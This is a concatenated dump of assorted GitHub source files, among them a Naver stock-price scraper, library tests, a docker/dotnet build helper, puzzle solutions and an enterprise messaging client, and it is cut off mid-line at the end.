int(NAVER_data_realTime_result)\r\nprint(NAVER_data_realTime_int)\r\nprint(NAVER_data_realTime)\r\n\r\n#LGD\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=034220\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nLGD_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nLGD_data_first = LGD_data.find(\"span\", {\"class\": \"blind\"})\r\nLGD_data_realTime = LGD_data_first.text # 실시간 가격\r\nLGD_data_realTime_result = LGD_data_realTime.replace(\",\",\"\")\r\nLGD_data_realTime_int = int(LGD_data_realTime_result)\r\nprint(LGD_data_realTime_int)\r\nprint(LGD_data_realTime)\r\n\r\ntry:\r\n with conn.cursor() as cursor:\r\n # CJ 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (CJ_data_realTime_int, 'CJ'))\r\n\r\n # LG 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (LG_data_realTime_int, 'LG'))\r\n\r\n # SK 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (SK_data_realTime_int, 'SK'))\r\n\r\n # DOOSAN 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (DOOSAN_data_realTime_int, '두산'))\r\n\r\n # SAMSUNG 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (samsung_data_realTime_int, '삼성'))\r\n\r\n # ASIANA 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (ASIANA_data_realTime_int, '아시아나항공'))\r\n\r\n # KAKAO 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (KAKAO_data_realTime_int, '카카오'))\r\n\r\n # HANWHA 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (HANWHA_data_realTime_int, '한화'))\r\n\r\n # HYUNDAI 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (HYUNDAI_data_realTime_int, '현대'))\r\n\r\n # JINRO 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (JINRO_data_realTime_int, '하이트진로'))\r\n\r\n # NAVER 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (NAVER_data_realTime_int, '네이버'))\r\n\r\n # LGD 디비넣기\r\n sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n cursor.execute(sql, (LGD_data_realTime_int, 'LGD'))\r\n\r\n conn.commit()\r\n\r\nfinally:\r\n conn.close()\r\n","repo_name":"geniuses777/SPF","sub_path":"최종코드/이가현/company_now.py","file_name":"company_now.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74593137106","text":"import random\n\nnumber = input('Guess a number between 1 and 10\\n')\n\nx = random.randint(1, 11)\n\nif x == number:\n print(\"you guesed right\")\nelse: \n print(\"You guess Incorrect\")\n print(\"The number was:\", x)\n\n","repo_name":"adrian2002h/Number-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16864450381","text":"# project\nfrom dephell.controllers import Graph, Mutator, Resolver, analyze_conflict\n\n# app\nfrom ..helpers import Fake, make_root\n\n\ndef merge(*roots, merged=True, deps=None):\n graph = Graph()\n for root in roots:\n graph.add(root)\n resolver = Resolver(graph=graph, mutator=Mutator())\n resolved = resolver.resolve(level=1)\n\n try:\n assert merged == resolved\n except AssertionError:\n if resolved is False:\n print(analyze_conflict(resolver=resolver))\n raise\n\n if deps:\n for dep in deps:\n assert dep in resolver.graph\n names = set(resolver.graph.names) - {root.name for root in roots}\n assert names == set(deps)\n\n return resolver\n\n\ndef test_simple_merge():\n root1 = make_root(\n root=Fake('', 'a', 'b'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), ),\n )\n root2 = make_root(\n root=Fake('', 'c', 'd'),\n c=(Fake('1.0'), ),\n d=(Fake('1.0'), ),\n )\n merge(root1, root2, deps=('a', 'b', 'c', 'd'))\n\n\ndef test_merge_with_common_dep():\n root1 = make_root(\n root=Fake('', 'a', 'b'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), ),\n )\n root2 = make_root(\n root=Fake('', 'b', 'c'),\n b=(Fake('1.0'), ),\n c=(Fake('1.0'), ),\n )\n merge(root1, root2, deps=('a', 'b', 'c'))\n\n\ndef test_merge_with_constraint():\n root1 = make_root(\n root=Fake('', 'a', 'b>=1.0'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), Fake('2.0')),\n )\n root2 = make_root(\n root=Fake('', 'b<2.0', 'c'),\n b=(Fake('1.0'), Fake('2.0')),\n c=(Fake('1.0'), ),\n )\n resolver = merge(root1, root2, deps=('a', 'b', 'c'))\n constraint = str(resolver.graph.get('b').constraint)\n assert constraint == '<2.0,>=1.0'\n\n\ndef test_merge_conflict():\n root1 = make_root(\n root=Fake('', 'a', 'b<=1.0'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), Fake('2.0')),\n )\n root2 = make_root(\n root=Fake('', 'b>=2.0', 'c'),\n b=(Fake('1.0'), Fake('2.0')),\n c=(Fake('1.0'), ),\n )\n resolver = merge(root1, root2, merged=False)\n assert resolver.graph.conflict.name == 'b'\n","repo_name":"dephell/dephell","sub_path":"tests/test_resolving/test_merging.py","file_name":"test_merging.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"13016316670","text":"import json\nimport logging\n\nfrom faker import Faker\n\nimport pubsub\nfrom settings import GOOGLE_PROJECT_ID, PUBSUB_TOPIC\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[logging.FileHandler(\"debug.log\"),\n logging.StreamHandler()],\n)\n\n\ndef run(project, topic):\n Faker.seed(0)\n faker = Faker()\n pubsub.get_or_create_topic(project, topic)\n id = 0\n while True:\n simple_profile = faker.simple_profile()\n simple_profile[\"id\"] = id\n id += 1\n simple_profile = json.dumps(simple_profile, default=str)\n pubsub.publish(project, topic, data=simple_profile.encode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n run(project=GOOGLE_PROJECT_ID, topic=PUBSUB_TOPIC)\n","repo_name":"mfilipelino/cdc-event-souce-generator","sub_path":"cdc_generation.py","file_name":"cdc_generation.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23447248906","text":"from collections import deque\n\ncheck_idx = [[-1, -2, 2], [1, 2, -2]] # 체크할 톱니바퀴 idx, 비교할 내 톱니 idx, 비교할 상대의 톱니 idx\n\nvalid_range = lambda gear_idx: 0 <= gear_idx < 4\n\n\ndef solution(gears_idx, move):\n visited = [False] * 4\n que = deque()\n que.append((gears_idx, move))\n while que:\n now_gear_idx, now_move = que.popleft()\n visited[now_gear_idx] = True\n for i in range(2):\n check_gear_idx, my_gear, other_gear = check_idx[i]\n check_gear_idx += now_gear_idx\n if not valid_range(check_gear_idx):\n continue\n now_start_idx, other_start_idx = start_index[now_gear_idx], start_index[check_gear_idx]\n now_gear = now_start_idx + my_gear\n other_gear = other_start_idx + other_gear\n if not visited[check_gear_idx] and gears[now_gear_idx][now_gear % 8] != gears[check_gear_idx][other_gear % 8]:\n que.append((check_gear_idx, now_move * -1))\n if now_move == -1:\n start_index[now_gear_idx] += 1\n else:\n start_index[now_gear_idx] -= 1\n\n\ngears = [list(map(int, list(input()))) for _ in range(4)]\nstart_index = [0] * 4\nK = int(input())\nmoves = [list(map(int, input().split())) for _ in range(K)]\n\nfor move in moves:\n solution(move[0] - 1, move[1])\n\nanswer = 0\nfor i in range(4):\n answer += int(pow(2, (i+1) * gears[i][start_index[i]%8] - 1))\nprint(answer)\n","repo_name":"JoungMinJu/PyCodingTest","sub_path":"rvd/first/BOJ_14891.py","file_name":"BOJ_14891.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43414285077","text":"import sys\nfrom collections import deque\nsys.stdin = open(\"sources/input-10.txt\", \"r\")\n\n\nwhile True:\n try:\n test_case = int(input())\n arr = deque(map(int, input().split()))\n while 0 not in arr:\n for i in range(1, 6):\n next = arr.popleft()-i\n if next <= 0:\n arr.append(0)\n break\n else:\n arr.append(next)\n print(\"#{}\".format(test_case), end=\" \")\n for i in arr:\n print(\"{}\".format(i), end=\" \")\n print()\n except:\n break\n","repo_name":"Guitarboyjason/Algorithm","sub_path":"SWExpertacademyPython/1225. 암호생성기.py","file_name":"1225. 암호생성기.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38485158659","text":"\nimport sys\nsys.path.append('.')\nfrom utils import HParam\nfrom kg_generator import *\nfrom gpt2_generator import gpt2_model_gpt2_generator, GPT2_BaseLitModel\nfrom training.util import import_class, setup_data_from_args\n\nimport argparse\nimport torch\nimport pytorch_lightning as pl\n\n\ndef main():\n parser = argparse.ArgumentParser(add_help=False)\n\n\n parser.add_argument(\"--help\", \"-h\", action=\"help\")\n parser.add_argument(\"-c\",'--config',default='config/default.yaml', type=str, help='set the config file')\n parser.add_argument(\"-m\", type=str, required= True, help='model name')\n\n args = parser.parse_args()\n hp = HParam(args.config)\n\n #kg_model = kg_model_transformer_generator(hp.kg.pretrained_file)\n kg_model = kg_model_entities_generator(hp.kg.pretrained_file,4)\n #data\n data, tokenizer= setup_data_from_args(hp)\n\n kg_module = KG_BaseLitModel(kg_model, tokenizer,args=hp.kg)\n trainer = pl.Trainer(accelerator='mps',\n devices=1,\n max_epochs=3,\n )\n \n #trainer.test(combined_module,data)\n logits = kg_module.predict(['蓝方直升机被红方载具击伤撤退,多名步兵由D6绕至D7'])\n print(logits)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Seafood-SIMIT/BattlefieldSATrainer","sub_path":"test/test_kg.py","file_name":"test_kg.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20785773729","text":"import dask\nimport pytest\nimport xarray as xr\nfrom xarray.core.utils import Frozen\nfrom xarray.testing import assert_allclose\n\nfrom climpred.bootstrap import dpp_threshold\nfrom climpred.stats import decorrelation_time, dpp\n\ntry:\n from climpred.bootstrap import varweighted_mean_period_threshold\n from climpred.stats import varweighted_mean_period\nexcept ImportError:\n pass\n\nfrom . import requires_xrft\n\nITERATIONS = 2\n\n\n@pytest.mark.parametrize(\"chunk\", (True, False))\ndef test_dpp(PM_ds_control_3d, chunk):\n \"\"\"Check for positive diagnostic potential predictability in NA SST.\"\"\"\n res = dpp(PM_ds_control_3d, chunk=chunk)\n assert res.mean() > 0\n\n\n@requires_xrft\n@pytest.mark.parametrize(\"func\", (varweighted_mean_period, decorrelation_time))\ndef test_potential_predictability_likely(PM_ds_control_3d, func):\n \"\"\"Check for positive diagnostic potential predictability in NA SST.\"\"\"\n res = func(PM_ds_control_3d)\n assert res.mean() > 0\n\n\ndef test_bootstrap_dpp_sig50_similar_dpp(PM_ds_control_3d):\n sig = 50\n actual = dpp_threshold(PM_ds_control_3d, iterations=ITERATIONS, sig=sig).drop_vars(\n \"quantile\"\n )\n expected = dpp(PM_ds_control_3d)\n xr.testing.assert_allclose(actual, expected, atol=0.5, rtol=0.5)\n\n\n@requires_xrft\ndef test_bootstrap_vwmp_sig50_similar_vwmp(PM_ds_control_3d):\n sig = 50\n actual = varweighted_mean_period_threshold(\n PM_ds_control_3d, iterations=ITERATIONS, sig=sig\n ).drop_vars(\"quantile\")\n expected = varweighted_mean_period(PM_ds_control_3d)\n xr.testing.assert_allclose(actual, expected, atol=2, rtol=0.5)\n\n\ndef test_bootstrap_func_multiple_sig_levels(PM_ds_control_3d):\n sig = [5, 95]\n actual = dpp_threshold(PM_ds_control_3d, iterations=ITERATIONS, sig=sig)\n assert actual[\"quantile\"].size == len(sig)\n assert (actual.isel(quantile=0) <= actual.isel(quantile=1)).to_array().all()\n\n\n@requires_xrft\n@pytest.mark.parametrize(\"step\", [1, 2, -1])\n@pytest.mark.parametrize(\n \"func\",\n [dpp, varweighted_mean_period, decorrelation_time],\n)\ndef test_stats_functions_dask_chunks(PM_ds_control_3d, func, step):\n \"\"\"Check whether selected stats functions be chunked and computed along other\n dim.\"\"\"\n dim = \"time\"\n for chunk_dim in PM_ds_control_3d.isel({dim: 0}).dims:\n control_chunked = PM_ds_control_3d.chunk({chunk_dim: step})\n res_chunked = func(control_chunked, dim=dim)\n res = func(PM_ds_control_3d, dim=dim)\n # check for chunks\n assert dask.is_dask_collection(res_chunked)\n assert res_chunked.chunks is not None\n # check for no chunks\n assert not dask.is_dask_collection(res)\n assert res.chunks == Frozen({})\n # check for identical result\n assert_allclose(res, res_chunked.compute(), atol=0.001, rtol=1e-4)\n","repo_name":"pangeo-data/climpred","sub_path":"climpred/tests/test_stats.py","file_name":"test_stats.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"48"} +{"seq_id":"44582613944","text":"import pygame as pg\nfrom SwingyMonkey import SwingyMonkey\nimport argparse\nimport matplotlib.pyplot as plt\n\nfrom SimpleNN import SimpleNNLearner, SimpleNNTrained\nfrom ReplayNN import ReplayNNLearner, ReplayNNTrained\nfrom HighGTableLearner import HighGTableLearner\nfrom HighGTableTrained import HighGTableTrained\nfrom LowGTableLearner import LowGTableLearner\nfrom LowGTableTrained import LowGTableTrained\n\n\nAGENT_DICT = {\n 'simple_nn': {True: SimpleNNLearner, False: SimpleNNTrained},\n 'replay_nn': {True: ReplayNNLearner, False: ReplayNNTrained},\n 'low_g_table': {True: LowGTableLearner, False: LowGTableTrained},\n 'high_g_table': {True: HighGTableLearner, False: HighGTableTrained}\n}\n\n\ndef run_games(agent, epochs, tick_length):\n history = []\n for epoch in range(epochs):\n # Make a new monkey object.\n swing = SwingyMonkey(sound=False,\n text=f\"Epoch {epoch}\",\n tick_length=tick_length,\n action_callback=agent.action_callback,\n reward_callback=agent.reward_callback)\n\n # Loop until you hit something.\n while swing.game_loop():\n pass\n\n # Save score history.\n history.append(swing.score)\n\n # Reset the state of the learner.\n agent.reset()\n\n if epoch > 0 and epoch % 100 == 0:\n print(max(history[-100:]))\n print(sum(history[-100:])/100.0)\n pg.quit()\n return history\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"agent\", help=\"Possible values: simple_nn, replay_nn, low_g_table, high_g_table\", type=str)\n parser.add_argument(\"-t\", \"--train\", help=\"True: Train new agent, False: Use saved agent\", type=bool, default=False)\n parser.add_argument(\"-e\", \"--epochs\", help=\"Number of epochs\", type=int, default=400)\n parser.add_argument(\"-tl\", \"--tick_length\", help=\"Tick length in ms\", type=int, default=50)\n args = parser.parse_args()\n\n agent = AGENT_DICT[args.agent][args.train]()\n history = run_games(agent, args.epochs, args.tick_length)\n\n fig, ax = plt.subplots()\n ax.plot(history)\n plt.show()\n","repo_name":"jonriege/P4-reinforcement-learning-exercise","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36400884728","text":"def vowel_count(phrase):\n \"\"\"Return frequency map of vowels, case-insensitive.\n\n >>> vowel_count('rithm school')\n {'i': 1, 'o': 2}\n \n >>> vowel_count('HOW ARE YOU? i am great!') \n {'o': 2, 'a': 3, 'e': 2, 'u': 1, 'i': 1}\n \"\"\"\n vowel_dict = {}\n lower_phrase = phrase.lower()\n vowels = \"aeiou\"\n for char in lower_phrase:\n if not vowels.find(char) == -1:\n vowel_dict[char] = lower_phrase.count(char)\n\n return vowel_dict\n ","repo_name":"CanonWiseman/unit_18","sub_path":"python-ds-practice/26_vowel_count/vowel_count.py","file_name":"vowel_count.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8938774259","text":"from textsummarizer.pipeline.stage_01_data_ingestion import DataIngestionTrainingPipeline\nfrom textsummarizer.pipeline.stage02_data_validation import DataValidationTrainingPipeline\nfrom textsummarizer.pipeline.stage_03_data_transformation import DataTransformationTrainingPipeline\nfrom textsummarizer.pipeline.stage04_model_training import ModelTraninerTrainingPipeline\nfrom textsummarizer.pipeline.stage05_model_evaluation import ModelEvaluationTrainingPipeline\nfrom textsummarizer.logging import logger\nimport os\nimport sys\n\n\nSTAGE_NANME=\"Data ingestion stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_ingestion=DataIngestionTrainingPipeline()\n data_ingestion.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\"Data Validation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_validation=DataValidationTrainingPipeline()\n data_validation.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\"Data Transformation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_transformation=DataTransformationTrainingPipeline()\n data_transformation.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n\nSTAGE_NANME=\" Model Training stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n model_trainer=ModelTraninerTrainingPipeline()\n model_trainer.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\" Model evaluation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n model_evaluation=ModelEvaluationTrainingPipeline()\n model_evaluation.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e","repo_name":"Sainath6566/TextSummarizerProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20396840018","text":"def infiltrate_firewall(delay, stealth=False):\n \"\"\" Computes the severity of infiltrating firewall given delay\n delay: ticks to wait before infiltrating\n stealth: restart if true and caught by scanner\n \"\"\"\n severity = 0\n # The depth of a layer of the firewall is how many ticks have occured\n for tick, range in firewall.items():\n if (tick + delay) % (2*range - 2) == 0:\n severity = (severity + tick*range) if not stealth else -1\n if stealth:\n break\n return severity\n\n\nfirewall = {}\nfor x in open('./Inputs/day13.txt').readlines():\n depth, r = map(int,x.split(\":\"))\n firewall[depth] = r\nprint(\"Part 1:\", infiltrate_firewall(0))\n\ndelay = 0\nwhile True:\n delay += 1\n if infiltrate_firewall(delay, True) == 0:\n break\nprint(\"Part 2:\", delay)","repo_name":"willyao94/advent-of-code-2017","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41187414298","text":"import os\nimport subprocess\nfrom subprocess import run\nimport yaml\n\nimport parser \nimport aws\n\nglobal args\n\ndef get_arguments():\n global args\n args = parser.get_arguments()\n\n#dotnet stages functions\ndef dotnet_stages(dir_path):\n if args.dotnet_clean == 'y':\n dotnet_clean()\n \n publish(args.workspace_folder + '/src/' + args.project_namespace, dir_path)\n copy_envs(args.workspace_folder, dir_path)\n\ndef dotnet_clean():\n command = ['dotnet', 'clean', get_proj_file()]\n print(command)\n\ndef publish(base_path, dir_path):\n pubish_command = ['dotnet', 'publish', base_path, '-o', dir_path+'/publish', '-c', 'release']\n run_command(pubish_command)\n\ndef copy_envs(base_path, dir_path):\n copy_runsh(base_path, dir_path)\n copy_values(base_path + '/src/main/kubernetes/dev/values.yaml', dir_path + '/env_files/env_file.env')\n\ndef copy_runsh(base_path, dir_path):\n path_runsh = base_path + '/run.sh'\n\n if os.path.exists(base_path) and args.debug_inside == 'n':\n cp_command = ['cp', path_runsh, dir_path]\n run_command(cp_command)\n else: \n print('run.sh NOT FOUND')\n\ndef copy_values(from_path, to_path):\n yaml_file = read_yaml_file(from_path)\n\n env_file = yaml_to_env(yaml_file)\n\n try:\n f = open(to_path, 'w')\n f.writelines(env_file)\n f.close()\n except:\n print('Erro ao abrir arquivo ' + to_path)\n \ndef yaml_to_env(yaml_file):\n env = ''\n\n for x in yaml_file[\"env\"]:\n env += str(x['name']) + '=' + str(x['value']) + '\\n'\n\n return env\n\ndef get_proj_file():\n return args.workspace_folder + '/src/' + args.project_namespace + '/' + args.project_namespace + '.csproj'\n\n#docker stages functions\ndef docker_stages(dir_path):\n docker_build(dir_path)\n docker_run(dir_path)\n stop_container()\n\ndef get_tag_arg(dotnet_version):\n if \"3.1\" in dotnet_version:\n return \"3.1.21-bionic\"\n\n if \"5.0\" in dotnet_version:\n return \"5.0.12-buster-slim\"\n\n if \"6.0\" in dotnet_version:\n return \"6.0.0-bullseye-slim\"\n\n return \"5.0.12-buster-slim\"\n\ndef docker_build(dir_path): \n tag_arg = get_tag_arg(args.dotnet_version)\n build_command = ['docker', 'build', '--tag', args.image_name, '--build-arg', f'TAG={tag_arg}', dir_path + '/.'] \n run_command(build_command)\n\ndef docker_run(dir_path):\n base_command = ['docker', 'run']\n \n if args.detach == 'y':\n print('CONTAINER ID')\n base_command.append('-d')\n\n base_command.append('-p')\n base_command.append(args.port)\n\n path_env_file_aws = dir_path + '/env_files/env_file_aws'\n path_env_file = dir_path + '/env_files/env_file.env'\n\n if os.path.exists(path_env_file_aws):\n base_command.append('--env-file')\n base_command.append(path_env_file_aws)\n\n if os.path.exists(path_env_file):\n base_command.append('--env-file')\n base_command.append(path_env_file) \n #base_command.append('-it') # usar quando conseguir debugar dentro do container\n base_command.append(args.image_name) \n run_command(base_command)\n\ndef stop_container():\n if args.detach == 'n':\n print('STOPING THE CONTAINER')\n command_stop = ['docker stop $(docker ps -q -l)']\n run_command(command_stop, shell=True)\n if args.remove == 'y':\n print('REMOVING THE CONTAINER')\n command_remove = ['docker rm $(docker ps -q -l)']\n run_command(command_remove, shell=True)\n else:\n print('RUNNING CONTAINER IN DETACH MODE\\n' + 'Type \"docker ps\" to see the container info')\n\ndef read_yaml_file(dir_path):\n try:\n f = open(dir_path)\n y = yaml.load(f, Loader=yaml.FullLoader)\n f.close()\n return y\n except:\n print('Erro ao abrir arquivo ' + dir_path)\n return ''\n\ndef run_command(command, shell=False): \n print(f\"\\n{' '.join(command)}\\n\") \n try:\n result_command = run(command, universal_newlines=True, shell=shell, check=True)\n print(result_command) \n except KeyboardInterrupt as err:\n print('\\nCOMANDO CANCELADO')\n except Exception as ex:\n print('ERRO AO EXECUTAR COMANDO:', ex)\n raise\n\n#aws functions\ndef get_credentials(dir_path):\n command = aws.getCredentialsCommand(dir_path)\n run_command(command, shell=True)\n\ndef main():\n get_arguments()\n dir_path = os.path.dirname(os.path.realpath(__file__))\n \n if not os.path.exists(dir_path + '/env_files'):\n os.mkdir(dir_path + '/env_files')\n\n if not os.path.exists(dir_path + '/certs'):\n os.mkdir(dir_path + '/certs')\n\n if args.aws == 'y':\n get_credentials(dir_path + '/env_files/env_file_aws')\n\n dotnet_stages(dir_path)\n \n docker_stages(dir_path)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mayconbj15/docker_locally","sub_path":"dotnet_docker.py","file_name":"dotnet_docker.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4115389059","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n主动调用接口\n\"\"\"\n\nimport json\nimport time\nfrom os.path import join, abspath\n\nimport requests\nfrom requests_toolbelt import MultipartEncoder\n\nfrom .api import *\nfrom entapp.aes import AESCrypto\nfrom entapp.error import *\nfrom entapp.message import Message\nfrom entapp.utils import *\n\n\nFILE_TYPE_FILE = 'file'\nFILE_TYPE_IMAGE = 'image'\n\n\nclass AppClient(object):\n \"\"\"\n 企业应用主动调用接口客户端\n \"\"\"\n\n def __init__(self, buin, app_id, aes_key, address):\n \"\"\"\n 构造函数\n :param buin: 企业总机号\n :param app_id: AppId\n :param aes_key: encodingaeskey\n :param address: 有度服务器地址(IP:PORT)\n\n :type buin: int\n :type app_id: unicode or str\n :type aes_key: unicode or str\n :type address: unicode or str\n \"\"\"\n check_type(buin, int)\n check_types(app_id, unicode_str(), str)\n check_types(aes_key, unicode_str(), str)\n check_types(address, unicode_str(), str)\n self.__buin = buin\n self.__app_id = pystr(app_id)\n self.__address = pystr(address)\n self.__crypto = AESCrypto(app_id, aes_key)\n self.__token_info = None\n\n @property\n def buin(self):\n \"\"\"\n 企业总机号\n :rtype: int\n \"\"\"\n return self.__buin\n\n @property\n def app_id(self):\n \"\"\"\n AppId\n :rtype: str\n \"\"\"\n return self.__app_id\n\n @property\n def address(self):\n \"\"\"\n 有度服务器地址(IP:PORT)\n :rtype: str\n \"\"\"\n return self.__address\n\n def __check_and_refresh_token(self):\n \"\"\"\n 检查token,不存在或者过期则取获取一次token\n \"\"\"\n now = int(time.time())\n if self.__token_info is None or self.__token_info[1] + self.__token_info[2] < now:\n token_url = '{scheme}{address}{uri}'.format(\n scheme=SCHEME, address=self.__address, uri=API_GET_TOKEN)\n access_token, expire_in = _get_token(self.__buin, self.__app_id, token_url, self.__crypto)\n self.__token_info = (access_token, expire_in, now)\n\n def send_msg(self, msg):\n \"\"\"\n 发送消息\n :param msg: 消息对象\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type msg: Message\n \"\"\"\n check_type(msg, Message)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_SEND_MSG, self.__token_info[0])\n _send_msg(self.__buin, self.__app_id, url, self.__crypto, msg)\n\n def upload_file(self, file_type, file_name, file_path):\n \"\"\"\n 上传文件\n :param file_type: 文件类型\n :param file_name: 文件名称\n :param file_path: 文件路径\n :return: 资源Id\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 读文件错误\n\n :type file_type: str\n :type file_name: unicode or str\n :type file_path: unicode or str\n :rtype: str\n \"\"\"\n check_type(file_type, str)\n check_types(file_name, unicode_str(), str)\n check_types(file_path, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_UPLOAD_FILE, self.__token_info[0])\n return _upload_file(self.__buin, self.__app_id, url, self.__crypto, file_type, pystr(file_name), pystr(file_path))\n\n def download_file(self, media_id, out_dir):\n \"\"\"\n 下载文件\n :param media_id: 资源Id\n :param out_dir: 输出文件的目录\n :return: (name: 文件名称, size: 文件大小,单位:字节, content: 文件内容)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 写文件错误\n\n :type media_id: unicode or str\n :type out_dir: unicode or str\n :rtype: (str, int, bytes)\n \"\"\"\n check_types(media_id, unicode_str(), str)\n check_types(out_dir, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_DOWNLOAD_FILE, self.__token_info[0])\n return _download_file(self.__buin, self.__app_id, url, self.__crypto, pystr(media_id), pystr(out_dir))\n\n def search_file(self, media_id):\n \"\"\"\n 搜索文件信息\n :param media_id: 资源Id\n :return: (文件名, 字节数大小)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type media_id: unicode or str\n :rtype: (str, int)\n \"\"\"\n check_types(media_id, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_SEARCHE_FILE, self.__token_info[0])\n return _search_file(self.__buin, self.__app_id, url, self.__crypto, pystr(media_id))\n\n\ndef _url_with_token(address, uri, token):\n \"\"\"\n 生成带Token的url\n :param address: 服务器地址(IP:PORT)\n :param uri: 接口\n :param token: token\n :return: URL\n\n :type address: str\n :type uri: str\n :type token: str\n :rtype: str\n \"\"\"\n return '{scheme}{address}{uri}?accessToken={token}'.format(\n scheme=SCHEME, address=address, uri=uri, token=token)\n\n\ndef _parse_status(rsp):\n\n \"\"\"\n 解析接口错误码\n :param rsp: requests返回的请求结果\n :except HttpRequestError: 失败则抛出异常\n \"\"\"\n if rsp.status_code != requests.codes.OK:\n try:\n rsp.raise_for_status()\n except requests.HTTPError as e:\n raise HttpRequestError(rsp.status_code, 'request failed', 